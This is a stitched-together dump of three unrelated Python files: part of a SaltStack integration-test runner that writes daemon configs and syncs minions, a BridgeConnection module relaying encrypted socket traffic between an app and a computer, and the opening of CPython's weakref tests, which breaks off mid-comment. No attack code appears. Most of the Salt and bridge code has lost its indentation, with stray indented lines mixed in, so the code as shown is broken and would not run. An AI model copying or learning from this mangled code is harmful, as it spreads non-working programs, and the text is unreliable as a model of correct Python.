os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
master_opts['pki_dir'] = 'pki'
master_opts['syndic_master'] = 'localhost'
pytest_stop_sending_events_file = os.path.join(TMP_ROOT_DIR, 'pytest_stop_sending_events_file_master')
with salt.utils.files.fopen(pytest_stop_sending_events_file, 'w') as wfh:
wfh.write('')
master_opts['pytest_stop_sending_events_file'] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
        # This syndic connects to the master above
        syndic_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic'))
        syndic_opts['cachedir'] = 'cache'
        syndic_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        syndic_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
        # This is the master of masters
        syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
        syndic_master_opts['cachedir'] = 'cache'
        syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
        syndic_master_opts['pki_dir'] = 'pki'
pytest_stop_sending_events_file = os.path.join(TMP_ROOT_DIR, 'pytest_stop_sending_events_file_syndic_master')
with salt.utils.files.fopen(pytest_stop_sending_events_file, 'w') as wfh:
wfh.write('')
syndic_master_opts['pytest_stop_sending_events_file'] = pytest_stop_sending_events_file
# This proxy connects to master
        proxy_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = 'cache'
# proxy_opts['user'] = running_tests_user
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = 'pki'
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
master_opts.setdefault("reactor", []).append(
{"salt/test/reactor": [os.path.join(FILES, "reactor-test.sls")]}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
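        # verify_env() creates any missing directories from the list below and
        # checks that they are usable by the user running the test suite.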
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
        """
try:
self.sub_minion_process.terminate()
except AttributeError:
pass
self.minion_process.terminate()
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
                log.error("self.master_process can't be terminated.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
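            # A jid only counts as finished after two consecutive polls report no
            # matching jobs; if it shows up as running again, the countdown resets.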
if not running and job_finished is False:
                # Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
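    # Helper for wait_for_jid(): returns the targets that still report the given
    # jid in their saltutil.running output.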
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
                        # An error has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
BridgeConnection.py
|
import threading
from connections.Routine import Routine
from connections.SyncConnection import SyncConnection
import socket
from data_base.Routines import Routines
from utils import Networking
from utils.DH_Encryption import Encryption
from utils.SmartThread import SmartThread
class BridgeConnection:
"""
    A bridge-type connection that defines the flow of traffic between an app and a computer.
"""
def __init__(self, app: socket, sync: SyncConnection, name: str, app_crypto: Encryption):
self.app = app
self.computer = sync.sock
self.id = sync.id
self.name = name
self.comp_crypto = sync.crypto
self.app_crypto = app_crypto
self.is_active = True
self.routines = Routines(name)
self.com_proc = None
self.app_proc = None
def __str__(self):
"""
A full description of the connection
"""
        return "\nApp Host: {}\nComp Host: {}\nName: {}".format(
            self.app.getpeername(), self.computer.getpeername(), self.name)
def activate(self):
"""
        This function builds the virtual bridge between the devices.
        The bridge allows unsynchronized network traffic to flow in both directions.
        If a message of the DISCONNECT type passes through the bridge, the bridge shuts down.
"""
self.computer.setblocking(False)
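        # Non-blocking mode presumably lets the computer-side bridge thread and any
        # scheduled routines share this socket; is_running() switches it back to
        # blocking once the bridge shuts down.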
self.app_proc = SmartThread(self.__app_bridge__, "app")
self.com_proc = SmartThread(self.__comp_bridge__, "computer")
self.app_proc.start()
self.com_proc.start()
        threading.Thread(target=self.is_running).start()
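    # Reads messages from the app, handles bridge-local operations (adding and
    # removing routines, disconnects) and forwards everything else to the computer.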
def __app_bridge__(self):
try:
is_done = False
while not is_done:
msg = Networking.receive(self.app, crypto=self.app_crypto)
if msg is None:
is_done = True
elif msg != "":
split = Networking.split(msg)
if split[0] == self.name:
if Networking.get_disconnected(msg):
self.routines.name = ""
is_done = True
if split[1] == Networking.Operations.ROUTINE.value:
# split[2] - wanted time
# split[3] - time zone relative to GMT
# split[4] - ACTION
# split[5] - name
self.routines.routines.append(Routine(split[2], split[3], self.computer, self.app,
split[4], split[5], self.comp_crypto))
elif split[1] == Networking.Operations.DEL_ROUTINE.value:
# split[2] - name
for rout in self.routines.routines:
if rout.name == split[2]:
rout.kill()
self.routines.routines.remove(rout)
else:
val = Networking.send(self.computer, Networking.assemble(arr=split[1:]),
crypto=self.comp_crypto)
if not val:
is_done = True
finally:
pass
def __comp_bridge__(self):
try:
is_done = False
while not is_done:
msg = Networking.receive(self.computer, crypto=self.comp_crypto)
if msg is None:
is_done = True
elif msg != "":
if Networking.get_disconnected(msg):
Networking.send(self.app, msg, crypto=self.app_crypto)
self.routines.name = ""
is_done = True
else:
Networking.send(self.app, msg, crypto=self.app_crypto)
finally:
pass
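    # Watchdog: waits for either bridge thread to exit, forces the survivor down
    # via raise_exception(), then restores the computer socket to blocking mode.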
def is_running(self):
while self.app_proc.is_alive() and self.com_proc.is_alive():
pass
t = self.app_proc if self.app_proc.is_alive() else self.com_proc
t.raise_exception()
while t.is_alive():
pass
self.computer.setblocking(True)
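# Illustrative usage (not part of the original module): once a server has an
# accepted app socket, a completed SyncConnection to the computer and the app's
# Encryption object, it could bridge the two like this; the variable names below
# are placeholders for objects created elsewhere in the server:
#
#     bridge = BridgeConnection(app_socket, sync_connection, "living-room-pc", app_crypto)
#     bridge.activate()  # spawns the app/computer bridge threads and the watchdog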
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
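# Simple self-referencing object; the mapping tests below use it to create
# cyclic garbage that only the cyclic garbage collector can reclaim.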
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
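# Intended to be used as "with collect_in_thread(): ..." around code whose
# weakref handling should be raced against garbage collection running in a
# separate thread.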
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
# The PyWeakref_* C API is documented as allowing either NULL or
